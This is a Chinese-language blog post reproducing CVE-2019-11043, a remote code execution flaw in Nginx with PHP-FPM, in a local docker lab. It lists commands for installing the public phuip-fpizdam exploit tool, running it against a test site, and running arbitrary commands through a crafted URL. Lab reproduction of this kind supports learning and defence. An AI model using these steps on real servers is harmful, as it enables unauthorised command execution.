CVE-2019-11043 远程代码执行漏洞复现

漏洞原因:
Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO
为空的情况下,存在逻辑缺陷。攻击者通过精心的构造和利用,可以导致远程代码执行。
影响范围:
在2019-09-26更新之前下载的PHP-FPM,且必须为Nginx + php-fpm 的服务器使用如下配置,会受到影响。
漏洞复现:
前提在阿里云端用docker 搭建漏洞环境
docker ps 列出所有在运行的容器信息
1,准备工具。phuip-fpizdam是检测漏洞的工具
下载phuip-fpizdamgit clone https://github.com/neex/phuip-fpizdam
2, 进入到下载好的phuip-fpizdam目录中,看看有没有文件。需要安装go语言。
3,安装go语言
apt install golang-go 安装go
go version 查看go版本
4,安装phuip-fpizdam
go get -u github.com/neex/phuip-fpizdam
5,浏览器上访问使用vulhub搭建的站点
6,启动工具phuip-fpizdam
cd go/bin 2
7,检验漏洞是否存在
./phuip-fpizdam 127.0.0.1:8080/index.php
8,漏洞利用,也可将whoami换成其他命令。
curl “http://127.0.0.1:8080/index.php?a=whoami"
本作品采用《CC 协议》,转载必须注明作者和本文链接
推荐文章: